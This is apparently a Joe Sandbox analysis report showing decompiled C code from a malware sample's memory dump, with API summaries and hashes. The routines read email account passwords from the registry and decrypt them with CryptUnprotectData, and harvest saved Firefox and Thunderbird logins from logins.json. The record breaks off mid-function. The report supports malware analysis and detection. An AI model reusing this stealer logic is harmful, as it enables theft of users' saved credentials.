				if(RegQueryValueExW(_t207, L"Email", 0, 0,  &_v9012,  &_v8) == 0) {
					E02D132FF( &_v20, _t199,  &_v9012);
				}
				_v8 = 0x1000;
				E02D11052( &_v9012, 0, 0x1000);
				_t211 = _t210 + 0xc;
				if(RegQueryValueExW(_t207, L"POP3 Server", 0, 0,  &_v9012,  &_v8) == 0) {
					E02D132FF( &_v24, _t199,  &_v9012);
				}
				_v8 = 0x1000;
				E02D11052( &_v9012, 0, 0x1000);
				_t212 = _t211 + 0xc;
				if(RegQueryValueExW(_t207, L"POP3 User", 0, 0,  &_v9012,  &_v8) == 0) {
					E02D132FF( &_v20, _t199,  &_v9012);
				}
				_v8 = 0x1000;
				E02D11052( &_v9012, 0, 0x1000);
				_t213 = _t212 + 0xc;
				if(RegQueryValueExW(_t207, L"SMTP Server", 0, 0,  &_v9012,  &_v8) == 0) {
					E02D132FF( &_v24, _t199,  &_v9012);
				}
				_v8 = 0x1000;
				E02D11052( &_v9012, 0, 0x1000);
				_t214 = _t213 + 0xc;
				_t124 = RegQueryValueExW(_t207, L"POP3 Password", 0, 0,  &_v9012,  &_v8);
				_t225 = _t124;
				if(_t124 == 0) {
					E02D11052( &_v17204, _t124, 0x1000);
					E02D1A632( &_v9012,  &_v17204, _t225, _v8);
					_t214 = _t214 + 0x10;
					E02D132FF( &_v16,  &_v17204,  &_v17204);
				}
				_v8 = 0x1000;
				E02D11052( &_v9012, 0, 0x1000);
				_t215 = _t214 + 0xc;
				_t130 = RegQueryValueExW(_t207, L"SMTP Password", 0, 0,  &_v9012,  &_v8);
				_t226 = _t130;
				if(_t130 == 0) {
					E02D11052( &_v17204, _t130, 0x1000);
					E02D1A632( &_v9012,  &_v17204, _t226, _v8);
					_t215 = _t215 + 0x10;
					E02D132FF( &_v16,  &_v17204,  &_v17204);
				}
				_v8 = 0x1000;
				E02D11052( &_v9012, 0, 0x1000);
				_t216 = _t215 + 0xc;
				_t136 = RegQueryValueExW(_t207, L"HTTP Password", 0, 0,  &_v9012,  &_v8);
				_t227 = _t136;
				if(_t136 == 0) {
					E02D11052( &_v17204, _t136, 0x1000);
					E02D1A632( &_v9012,  &_v17204, _t227, _v8);
					_t216 = _t216 + 0x10;
					E02D132FF( &_v16,  &_v17204,  &_v17204);
				}
				_v8 = 0x1000;
				E02D11052( &_v9012, 0, 0x1000);
				_t217 = _t216 + 0xc;
				_t142 = RegQueryValueExW(_t207, L"IMAP Password", 0, 0,  &_v9012,  &_v8);
				_t228 = _t142;
				if(_t142 == 0) {
					E02D11052( &_v17204, _t142, 0x1000);
					E02D1A632( &_v9012,  &_v17204, _t228, _v8);
					_t217 = _t217 + 0x10;
					E02D132FF( &_v16,  &_v17204,  &_v17204);
				}
				_v12 = 3;
				if(E02D13261( &_v24) > 0) {
					E02D11F95(_t217 - 0x10,  &_v24);
					E02D11FCB(_t180);
				}
				E02D113EF( &_v24);
				return 1;
			}































                                                                    0x02d1a29a
                                                                    0x02d1a29a
                                                                    0x02d1a2a2
                                                                    0x02d1a2ac
                                                                    0x02d1a2b8
                                                                    0x02d1a2c2
                                                                    0x02d1a2c7
                                                                    0x02d1a2c9
                                                                    0x02d1a2cc
                                                                    0x02d1a2da
                                                                    0x02d1a2e8
                                                                    0x02d1a2f8
                                                                    0x02d1a2fd
                                                                    0x02d1a303
                                                                    0x02d1a320
                                                                    0x02d1a32c
                                                                    0x02d1a32c
                                                                    0x02d1a33c
                                                                    0x02d1a346
                                                                    0x02d1a34b
                                                                    0x02d1a367
                                                                    0x02d1a373
                                                                    0x02d1a373
                                                                    0x02d1a37e
                                                                    0x02d1a38a
                                                                    0x02d1a38f
                                                                    0x02d1a3ab
                                                                    0x02d1a3b7
                                                                    0x02d1a3b7
                                                                    0x02d1a3c2
                                                                    0x02d1a3ce
                                                                    0x02d1a3d3
                                                                    0x02d1a3ef
                                                                    0x02d1a3fb
                                                                    0x02d1a3fb
                                                                    0x02d1a406
                                                                    0x02d1a412
                                                                    0x02d1a417
                                                                    0x02d1a433
                                                                    0x02d1a43f
                                                                    0x02d1a43f
                                                                    0x02d1a44a
                                                                    0x02d1a456
                                                                    0x02d1a45b
                                                                    0x02d1a473
                                                                    0x02d1a475
                                                                    0x02d1a477
                                                                    0x02d1a486
                                                                    0x02d1a49a
                                                                    0x02d1a49f
                                                                    0x02d1a4ac
                                                                    0x02d1a4ac
                                                                    0x02d1a4b7
                                                                    0x02d1a4c3
                                                                    0x02d1a4c8
                                                                    0x02d1a4e0
                                                                    0x02d1a4e2
                                                                    0x02d1a4e4
                                                                    0x02d1a4f3
                                                                    0x02d1a507
                                                                    0x02d1a50c
                                                                    0x02d1a519
                                                                    0x02d1a519
                                                                    0x02d1a524
                                                                    0x02d1a530
                                                                    0x02d1a535
                                                                    0x02d1a54d
                                                                    0x02d1a54f
                                                                    0x02d1a551
                                                                    0x02d1a560
                                                                    0x02d1a574
                                                                    0x02d1a579
                                                                    0x02d1a586
                                                                    0x02d1a586
                                                                    0x02d1a591
                                                                    0x02d1a59d
                                                                    0x02d1a5a2
                                                                    0x02d1a5ba
                                                                    0x02d1a5bc
                                                                    0x02d1a5be
                                                                    0x02d1a5cd
                                                                    0x02d1a5e1
                                                                    0x02d1a5e6
                                                                    0x02d1a5f3
                                                                    0x02d1a5f3
                                                                    0x02d1a5fb
                                                                    0x02d1a609
                                                                    0x02d1a614
                                                                    0x02d1a61b
                                                                    0x02d1a61b
                                                                    0x02d1a623
                                                                    0x02d1a62f

                                                                    APIs
                                                                    • RegQueryValueExW.ADVAPI32(?,Account Name,00000000,00000000,?,00001000,?,?,?,?,?,745CE710,761F8250,00000000,?,02D1A25E), ref: 02D1A31C
                                                                    • RegQueryValueExW.ADVAPI32(?,Email,00000000,00000000,?,00001000,?,?,?,?,?,?,?,?,745CE710,761F8250), ref: 02D1A363
                                                                    • RegQueryValueExW.ADVAPI32(?,POP3 Server,00000000,00000000,?,00001000), ref: 02D1A3A7
                                                                    • RegQueryValueExW.ADVAPI32(?,POP3 User,00000000,00000000,?,00001000), ref: 02D1A3EB
                                                                    • RegQueryValueExW.ADVAPI32(?,SMTP Server,00000000,00000000,?,00001000), ref: 02D1A42F
                                                                    • RegQueryValueExW.ADVAPI32(?,POP3 Password,00000000,00000000,?,00001000), ref: 02D1A473
                                                                    • RegQueryValueExW.ADVAPI32(?,SMTP Password,00000000,00000000,?,00001000), ref: 02D1A4E0
                                                                    • RegQueryValueExW.ADVAPI32(?,HTTP Password,00000000,00000000,?,00001000), ref: 02D1A54D
                                                                    • RegQueryValueExW.ADVAPI32(?,IMAP Password,00000000,00000000,?,00001000), ref: 02D1A5BA
                                                                      • Part of subcall function 02D1A632: GlobalAlloc.KERNEL32(00000040,-00000001,745CE730,?,?,?,02D1A5E6,00001000,?,00000000,00001000), ref: 02D1A650
                                                                      • Part of subcall function 02D1A632: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,02D1A5E6), ref: 02D1A686
                                                                      • Part of subcall function 02D1A632: lstrcpyW.KERNEL32 ref: 02D1A6BD
                                                                      • Part of subcall function 02D13261: lstrlenW.KERNEL32(745D0770,02D13646,?,?,?,02D2150A,02D235DB,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,02D235AB,00000000,745D0770,00000000), ref: 02D13268
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: QueryValue$AllocCryptDataGlobalUnprotectlstrcpylstrlen
                                                                    • String ID: Account Name$Email$HTTP Password$IMAP Password$POP3 Password$POP3 Server$POP3 User$SMTP Password$SMTP Server
                                                                    • API String ID: 6593746-2537589853
                                                                    • Opcode ID: 2da785869ca3415b65bcc50a56abf6f8d2efb90d5e077c2671c0a0d0343b2a05
                                                                    • Instruction ID: e8202bd3c3df347d7b10caf01884ceedb8ca0e5f7a45f60321bbf215065f5d2c
                                                                    • Opcode Fuzzy Hash: 2da785869ca3415b65bcc50a56abf6f8d2efb90d5e077c2671c0a0d0343b2a05
                                                                    • Instruction Fuzzy Hash: 69A1FEB2D10159BADB25EA90ED45FEE737DEF14744F1000A5F609F6280E674AF488FA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1AC0A Relevance: 28.4, APIs: 5, Strings: 11, Instructions: 406filestringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 95%
                                                                    			E02D1AC0A(intOrPtr __ecx, void* __eflags, char _a4) {
				int _v12;
				int _v16;
				WCHAR* _v20;
				WCHAR* _v24;
				char _v28;
				intOrPtr _v32;
				WCHAR* _v36;
				char _v40;
				char _v44;
				int _v48;
				int _v52;
				int _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				long _v92;
				int _v96;
				intOrPtr _v100;
				char _v104;
				char _v108;
				char _v112;
				void* _v116;
				int _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				int _v156;
				char _v160;
				intOrPtr _v164;
				char _v180;
				char _v184;
				short _v704;
				short _v1224;
				char* _t165;
				void* _t167;
				int _t189;
				int _t190;
				int _t193;
				int _t207;
				WCHAR* _t215;
				void* _t217;
				int _t221;
				void* _t230;
				void* _t236;
				void* _t242;
				int _t281;
				int _t283;
				char* _t293;
				char* _t325;
				void* _t386;
				long _t389;
				intOrPtr _t391;
				intOrPtr _t392;
				WCHAR* _t393;
				int _t394;
				void* _t395;
				void* _t396;
				void* _t397;

				_t397 = __eflags;
				_t392 = __ecx;
				_v32 = __ecx;
				E02D135E5( &_v24, L"Profile");
				_t281 = 0;
				E02D11052( &_v1224, 0, 0x208);
				_t396 = _t395 + 0xc;
				_v92 = 0;
				_t389 = 0;
				E02D11052( &_v704, 0, 0x104);
				_t385 =  &_v704;
				if(E02D1C118(L"firefox.exe",  &_v704, _t397) != 0) {
					_t293 =  &_v44;
					E02D135E5(_t293,  &_v704);
					lstrcatW( &_v704, L"\\firefox.exe");
					GetBinaryTypeW( &_v704,  &_v92);
					_t399 = _v92 - 6;
					_t165 =  &_v44;
					if(_v92 != 6) {
						_push(0);
					} else {
						_push(1);
					}
					_push(_t293);
					E02D1362D(_t396, _t165);
					_t167 = E02D1BA00(_t392, _t385, _t399);
					_t400 = _t167;
					if(_t167 != 0) {
						E02D1346A( &_a4, _t385, _t400, L"\\Mozilla\\Firefox\\");
						E02D1362D( &_v36,  &_a4);
						E02D1346A( &_v36, _t385, _t400, L"profiles.ini");
						E02D13437( &_v24, E02D135E5( &_v40, L"Profile"));
						E02D15EA5(_v40);
						E02D13272( &_v24, _t385, _t400, _t281);
						while(GetPrivateProfileStringW(_v24, L"Path", _t281,  &_v1224, 0x104, _v36) != 0) {
							_t389 = _t389 + 1;
							_v40 = _t389;
							E02D13437( &_v24, E02D135E5( &_v96, L"Profile"));
							E02D15EA5(_v96);
							_v96 = _t281;
							E02D13272( &_v24, _t385, __eflags, _t389);
							E02D1362D( &_v12,  &_a4);
							E02D1346A( &_v12, _t385, __eflags,  &_v1224);
							E02D13554( &_v12,  &_v28);
							_t189 =  *((intOrPtr*)(_t392 + 0x68))(_v28);
							__eflags = _t189;
							if(_t189 == 0) {
								_t190 =  *((intOrPtr*)(_t392 + 0x80))();
								_v156 = _t190;
								__eflags = _t190;
								if(_t190 == 0) {
									goto L7;
								} else {
									_t193 =  *((intOrPtr*)(_t392 + 0x7c))(_t190, 1, _t281);
									_t396 = _t396 + 0xc;
									__eflags = _t193;
									if(_t193 != 0) {
										goto L7;
									} else {
										E02D1362D( &_v20,  &_v12);
										E02D1346A( &_v20, _t385, __eflags, L"\\logins.json");
										_t386 = 0x1a;
										E02D1F76B( &_v16, _t386, __eflags);
										E02D1346A( &_v16, _t386, __eflags, "\\");
										_t385 = 8;
										E02D13335( &_v16, __eflags, E02D134A7( &_v56, _t385, __eflags));
										E02D15EA5(_v56);
										_v56 = _t281;
										E02D1346A( &_v16, _t385, __eflags, L".tmp");
										_t393 = _v16;
										_t390 = _v20;
										__eflags = CopyFileW(_v20, _t393, _t281);
										if(__eflags != 0) {
											E02D13437( &_v20,  &_v16);
											_t390 = _v20;
										}
										E02D1FECE( &_v184, __eflags);
										_t325 =  &_v180;
										E02D13437(_t325,  &_v20);
										_push(_t325);
										_t207 = E02D20192( &_v184, 0xc0000000);
										_t327 =  &_v184;
										__eflags = _t207;
										if(__eflags != 0) {
											_v52 = _t281;
											_v48 = _t281;
											E02D1FE3D( &_v184, _t385,  &_v52, _v164, _t281);
											_t215 = E02D133BF( &_v116, "encryptedUsername");
											_t217 = E02D12F22( &_v52,  &_v160);
											_t385 = _t215;
											_t283 = E02D19EB7(_t217, _t215, __eflags);
											_v120 = _t283;
											E02D15EA5(_v160);
											_t336 = _v116;
											E02D15EA5(_v116);
											__eflags = _t283;
											if(_t283 == 0) {
												_t281 = 0;
												__eflags = 0;
											} else {
												_t391 = _v32;
												_t281 = 0;
												__eflags = 0;
												_t394 = _v120;
												do {
													_v112 = 0;
													_v108 = 0;
													_v104 = 0;
													_t230 = E02D133BF( &_v128, "hostname");
													E02D19EF0( &_v88, E02D12F22( &_v52,  &_v124), __eflags, _t230, _t394);
													E02D15EA5(_v124);
													E02D15EA5(_v128);
													_t236 = E02D133BF( &_v136, "encryptedUsername");
													E02D19EF0( &_v84, E02D12F22( &_v52,  &_v132), __eflags, _t236, _t394);
													E02D15EA5(_v132);
													E02D15EA5(_v136);
													_t242 = E02D133BF( &_v144, "encryptedPassword");
													_t385 = E02D12F22( &_v52,  &_v140);
													E02D19EF0( &_v80, _t244, __eflags, _t242, _t394);
													E02D15EA5(_v140);
													E02D15EA5(_v144);
													E02D1B15E(_t391, __eflags, _v84,  &_v72);
													E02D1B15E(_t391, __eflags, _v80,  &_v76);
													E02D13437( &_v112, E02D1309D( &_v88, __eflags,  &_v60));
													E02D15EA5(_v60);
													_v60 = 0;
													E02D13437( &_v108, E02D1309D(E02D133BF( &_v148, _v72), __eflags,  &_v64));
													E02D15EA5(_v64);
													_v64 = 0;
													E02D15EA5(_v148);
													E02D13437( &_v104, E02D1309D(E02D133BF( &_v152, _v76), __eflags,  &_v68));
													E02D15EA5(_v68);
													_v68 = 0;
													E02D15EA5(_v152);
													_t396 = _t396 - 0x10;
													_v100 = 0;
													E02D11F95(_t396,  &_v112);
													E02D11FCB(_t391);
													E02D15EA5(_v72);
													E02D15EA5(_v76);
													E02D15EA5(_v80);
													E02D15EA5(_v84);
													E02D15EA5(_v88);
													_t336 =  &_v112;
													E02D113EF( &_v112);
													_t394 = _t394 - 1;
													__eflags = _t394;
												} while (_t394 != 0);
												_t393 = _v16;
												_t390 = _v20;
											}
											_t221 = PathFileExistsW(_t393);
											__eflags = _t221;
											if(_t221 != 0) {
												E02D1362D(_t396,  &_v16);
												E02D1FF0B(_t336);
											}
											 *((intOrPtr*)(_v32 + 0x84))(_v156);
											 *((intOrPtr*)(_v32 + 0x6c))();
											E02D13036( &_v52);
											_t327 =  &_v184;
										}
										E02D1FEED(_t327, __eflags);
										E02D15EA5(_t393);
										_v16 = _t281;
										E02D15EA5(_t390);
										_v20 = _t281;
										E02D15EA5(_v28);
										E02D15EA5(_v12);
										_t389 = _v40;
										_t392 = _v32;
									}
								}
							} else {
								L7:
								E02D15EA5(_v28);
								E02D15EA5(_v12);
							}
							_v12 = _t281;
						}
						E02D1B9A9(_t392);
						_t281 = 1;
						E02D15EA5(_v36);
					}
					E02D15EA5(_v44);
				}
				E02D15EA5(_v24);
				E02D15EA5(_a4);
				return _t281;
			}







































































                                                                    0x02d1ac0a
                                                                    0x02d1ac16
                                                                    0x02d1ac20
                                                                    0x02d1ac23
                                                                    0x02d1ac2d
                                                                    0x02d1ac37
                                                                    0x02d1ac3c
                                                                    0x02d1ac3f
                                                                    0x02d1ac48
                                                                    0x02d1ac51
                                                                    0x02d1ac58
                                                                    0x02d1ac6b
                                                                    0x02d1ac78
                                                                    0x02d1ac7b
                                                                    0x02d1ac8c
                                                                    0x02d1ac9d
                                                                    0x02d1aca3
                                                                    0x02d1aca7
                                                                    0x02d1acaa
                                                                    0x02d1ad18
                                                                    0x02d1acac
                                                                    0x02d1acac
                                                                    0x02d1acac
                                                                    0x02d1acae
                                                                    0x02d1acb2
                                                                    0x02d1acb9
                                                                    0x02d1acbe
                                                                    0x02d1acc0
                                                                    0x02d1acce
                                                                    0x02d1acda
                                                                    0x02d1ace7
                                                                    0x02d1acfd
                                                                    0x02d1ad05
                                                                    0x02d1ad0e
                                                                    0x02d1b105
                                                                    0x02d1ad1b
                                                                    0x02d1ad24
                                                                    0x02d1ad30
                                                                    0x02d1ad38
                                                                    0x02d1ad41
                                                                    0x02d1ad44
                                                                    0x02d1ad50
                                                                    0x02d1ad5f
                                                                    0x02d1ad6b
                                                                    0x02d1ad73
                                                                    0x02d1ad77
                                                                    0x02d1ad79
                                                                    0x02d1ad90
                                                                    0x02d1ad96
                                                                    0x02d1ad9c
                                                                    0x02d1ad9e
                                                                    0x00000000
                                                                    0x02d1ada0
                                                                    0x02d1ada4
                                                                    0x02d1ada7
                                                                    0x02d1adaa
                                                                    0x02d1adac
                                                                    0x00000000
                                                                    0x02d1adae
                                                                    0x02d1adb5
                                                                    0x02d1adc2
                                                                    0x02d1adc9
                                                                    0x02d1adcd
                                                                    0x02d1adda
                                                                    0x02d1ade1
                                                                    0x02d1adee
                                                                    0x02d1adf6
                                                                    0x02d1ae03
                                                                    0x02d1ae06
                                                                    0x02d1ae0b
                                                                    0x02d1ae0e
                                                                    0x02d1ae1a
                                                                    0x02d1ae1c
                                                                    0x02d1ae25
                                                                    0x02d1ae2a
                                                                    0x02d1ae2a
                                                                    0x02d1ae33
                                                                    0x02d1ae3c
                                                                    0x02d1ae42
                                                                    0x02d1ae47
                                                                    0x02d1ae53
                                                                    0x02d1ae58
                                                                    0x02d1ae5e
                                                                    0x02d1ae60
                                                                    0x02d1ae70
                                                                    0x02d1ae74
                                                                    0x02d1ae77
                                                                    0x02d1ae84
                                                                    0x02d1ae95
                                                                    0x02d1ae9a
                                                                    0x02d1aea9
                                                                    0x02d1aeab
                                                                    0x02d1aeae
                                                                    0x02d1aeb3
                                                                    0x02d1aeb6
                                                                    0x02d1aebb
                                                                    0x02d1aebd
                                                                    0x02d1b090
                                                                    0x02d1b090
                                                                    0x02d1aec3
                                                                    0x02d1aec3
                                                                    0x02d1aec6
                                                                    0x02d1aec6
                                                                    0x02d1aec8
                                                                    0x02d1aecb
                                                                    0x02d1aed4
                                                                    0x02d1aed7
                                                                    0x02d1aeda
                                                                    0x02d1aedd
                                                                    0x02d1aef4
                                                                    0x02d1aefe
                                                                    0x02d1af06
                                                                    0x02d1af17
                                                                    0x02d1af2e
                                                                    0x02d1af38
                                                                    0x02d1af43
                                                                    0x02d1af54
                                                                    0x02d1af69
                                                                    0x02d1af6e
                                                                    0x02d1af7b
                                                                    0x02d1af86
                                                                    0x02d1af94
                                                                    0x02d1afa2
                                                                    0x02d1afb7
                                                                    0x02d1afbf
                                                                    0x02d1afc7
                                                                    0x02d1afe4
                                                                    0x02d1afec
                                                                    0x02d1aff7
                                                                    0x02d1affa
                                                                    0x02d1b01c
                                                                    0x02d1b024
                                                                    0x02d1b02f
                                                                    0x02d1b032
                                                                    0x02d1b037
                                                                    0x02d1b03a
                                                                    0x02d1b043
                                                                    0x02d1b04a
                                                                    0x02d1b052
                                                                    0x02d1b05a
                                                                    0x02d1b062
                                                                    0x02d1b06a
                                                                    0x02d1b072
                                                                    0x02d1b077
                                                                    0x02d1b07a
                                                                    0x02d1b07f
                                                                    0x02d1b07f
                                                                    0x02d1b07f
                                                                    0x02d1b088
                                                                    0x02d1b08b
                                                                    0x02d1b08b
                                                                    0x02d1b093
                                                                    0x02d1b099
                                                                    0x02d1b09b
                                                                    0x02d1b0a4
                                                                    0x02d1b0a9
                                                                    0x02d1b0ae
                                                                    0x02d1b0b8
                                                                    0x02d1b0c2
                                                                    0x02d1b0c8
                                                                    0x02d1b0cd
                                                                    0x02d1b0cd
                                                                    0x02d1b0d3
                                                                    0x02d1b0da
                                                                    0x02d1b0e1
                                                                    0x02d1b0e4
                                                                    0x02d1b0ec
                                                                    0x02d1b0ef
                                                                    0x02d1b0f7
                                                                    0x02d1b0fc
                                                                    0x02d1b0ff
                                                                    0x02d1b0ff
                                                                    0x02d1adac
                                                                    0x02d1ad7b
                                                                    0x02d1ad7b
                                                                    0x02d1ad7e
                                                                    0x02d1ad86
                                                                    0x02d1ad86
                                                                    0x02d1b102
                                                                    0x02d1b102
                                                                    0x02d1b12d
                                                                    0x02d1b137
                                                                    0x02d1b138
                                                                    0x02d1b138
                                                                    0x02d1b140
                                                                    0x02d1b140
                                                                    0x02d1b148
                                                                    0x02d1b150
                                                                    0x02d1b15b

                                                                    APIs
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,00000000,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D135EE
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D13605
                                                                      • Part of subcall function 02D135E5: lstrcpyW.KERNEL32 ref: 02D13620
                                                                      • Part of subcall function 02D1C118: lstrcpyW.KERNEL32 ref: 02D1C154
                                                                      • Part of subcall function 02D1C118: lstrcatW.KERNEL32(?,thunderbird.exe), ref: 02D1C162
                                                                      • Part of subcall function 02D1C118: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,02D1A729,?,00000104,00000000), ref: 02D1C17B
                                                                      • Part of subcall function 02D1C118: RegQueryValueExW.ADVAPI32(02D1A729,Path,00000000,?,?,?,?,00000104,00000000), ref: 02D1C198
                                                                      • Part of subcall function 02D1C118: RegCloseKey.ADVAPI32(02D1A729,?,00000104,00000000), ref: 02D1C1A1
                                                                    • lstrcatW.KERNEL32(?,\firefox.exe), ref: 02D1AC8C
                                                                    • GetBinaryTypeW.KERNEL32(?,?), ref: 02D1AC9D
                                                                    • GetPrivateProfileStringW.KERNEL32(?,Path,00000000,?,00000104,?), ref: 02D1B11D
                                                                      • Part of subcall function 02D13437: lstrcpyW.KERNEL32 ref: 02D1345C
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                      • Part of subcall function 02D13272: wsprintfW.USER32 ref: 02D1328D
                                                                      • Part of subcall function 02D1362D: lstrcpyW.KERNEL32 ref: 02D13657
                                                                      • Part of subcall function 02D13554: WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,02D14E98,?), ref: 02D13581
                                                                      • Part of subcall function 02D13554: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,02D14E98,?,?,?,?,?,00000000), ref: 02D135AC
                                                                    • CopyFileW.KERNEL32(?,?,00000000,.tmp,00000000,02D24684,\logins.json,?), ref: 02D1AE14
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcpy$ByteCharMultiWidelstrcatlstrlen$BinaryCloseCopyFileFreeOpenPrivateProfileQueryStringTypeValueVirtualwsprintf
                                                                    • String ID: .tmp$Path$Profile$\Mozilla\Firefox\$\firefox.exe$\logins.json$encryptedPassword$encryptedUsername$firefox.exe$hostname$profiles.ini
                                                                    • API String ID: 288196626-815594582
                                                                    • Opcode ID: be9ca25e6f7d9818e6dd16babb42f6d23bed874c6b8c4658901ca506c0cf2583
                                                                    • Instruction ID: beaf31a5673e38540bd741e869ac8fbaaf016dab1054aa3138048636dbeb6cc1
                                                                    • Opcode Fuzzy Hash: be9ca25e6f7d9818e6dd16babb42f6d23bed874c6b8c4658901ca506c0cf2583
                                                                    • Instruction Fuzzy Hash: E0E1E9B1D00118ABDF19EBA0EC91DEEB77AEF54304F50406AA506A7B90DF356E49CF60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1A6C8 Relevance: 24.9, APIs: 4, Strings: 10, Instructions: 404COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 94%
                                                                    			E02D1A6C8(intOrPtr __ecx, void* __eflags, char _a4) {
				int _v12;
				int _v16;
				WCHAR* _v20;
				WCHAR* _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				char _v44;
				int _v48;
				int _v52;
				long _v56;
				int _v60;
				int _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				intOrPtr _v88;
				char _v92;
				char _v96;
				char _v100;
				void* _v104;
				int _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				int _v152;
				long _v156;
				char _v160;
				intOrPtr _v164;
				char _v180;
				char _v184;
				short _v704;
				short _v1224;
				long _t171;
				int _t182;
				int _t183;
				int _t186;
				int _t200;
				WCHAR* _t208;
				void* _t210;
				int _t214;
				void* _t223;
				void* _t229;
				void* _t235;
				int _t279;
				int _t281;
				char* _t321;
				void* _t382;
				intOrPtr _t385;
				intOrPtr _t387;
				WCHAR* _t392;
				int _t393;
				void* _t394;
				void* _t395;
				void* _t396;

				_t396 = __eflags;
				_t385 = __ecx;
				_v32 = __ecx;
				E02D135E5( &_v24, L"Profile");
				_t279 = 0;
				E02D11052( &_v1224, 0, 0x208);
				_v56 = 0;
				_v156 = 0;
				E02D11052( &_v704, 0, 0x104);
				_t395 = _t394 + 0x14;
				_t381 =  &_v704;
				E02D1C118(L"thunderbird.exe",  &_v704, _t396);
				E02D135E5( &_v44,  &_v704);
				GetBinaryTypeW( &_v704,  &_v156);
				E02D1362D(_t395,  &_v44);
				_t289 = _t385;
				if(E02D1B67E(_t385,  &_v704,  &_v44) != 0) {
					L3:
					E02D1346A( &_a4, _t381, __eflags, L"\\Thunderbird\\");
					E02D1362D( &_v36,  &_a4);
					E02D1346A( &_v36, _t381, __eflags, L"profiles.ini");
					E02D13437( &_v24, E02D135E5( &_v40, L"Profile"));
					E02D15EA5(_v40);
					E02D13272( &_v24, _t381, __eflags, _t279);
					_push(_v36);
					_push(0x104);
					while(1) {
						_t389 = _v24;
						_t171 = GetPrivateProfileStringW(_v24, L"Path", _t279,  &_v1224, ??, ??);
						__eflags = _t171;
						if(_t171 == 0) {
							break;
						}
						_v56 = _v56 + 1;
						E02D13437( &_v24, E02D135E5( &_v60, L"Profile"));
						E02D15EA5(_v60);
						_v60 = _t279;
						E02D13272( &_v24, _t381, __eflags, _v56 + 1);
						E02D1362D( &_v12,  &_a4);
						E02D1346A( &_v12, _t381, __eflags,  &_v1224);
						E02D13554( &_v12,  &_v28);
						_t182 =  *((intOrPtr*)(_t385 + 0x68))(_v28);
						__eflags = _t182;
						if(_t182 == 0) {
							_t183 =  *((intOrPtr*)(_t385 + 0x80))();
							_v152 = _t183;
							__eflags = _t183;
							if(_t183 == 0) {
								goto L5;
							} else {
								_t186 =  *((intOrPtr*)(_t385 + 0x7c))(_t183, 1, _t279);
								_t395 = _t395 + 0xc;
								__eflags = _t186;
								if(_t186 != 0) {
									goto L5;
								} else {
									E02D1362D( &_v20,  &_v12);
									E02D1346A( &_v20, _t381, __eflags, L"\\logins.json");
									_t382 = 0x1a;
									E02D1F76B( &_v16, _t382, __eflags);
									E02D1346A( &_v16, _t382, __eflags, "\\");
									_t381 = 8;
									E02D13335( &_v16, __eflags, E02D134A7( &_v64, _t381, __eflags));
									E02D15EA5(_v64);
									_v64 = _t279;
									E02D1346A( &_v16, _t381, __eflags, L".tmp");
									_t392 = _v16;
									_t386 = _v20;
									__eflags = CopyFileW(_v20, _t392, _t279);
									if(__eflags != 0) {
										E02D13437( &_v20,  &_v16);
										_t386 = _v20;
									}
									E02D1FECE( &_v184, __eflags);
									_t321 =  &_v180;
									E02D13437(_t321,  &_v20);
									_push(_t321);
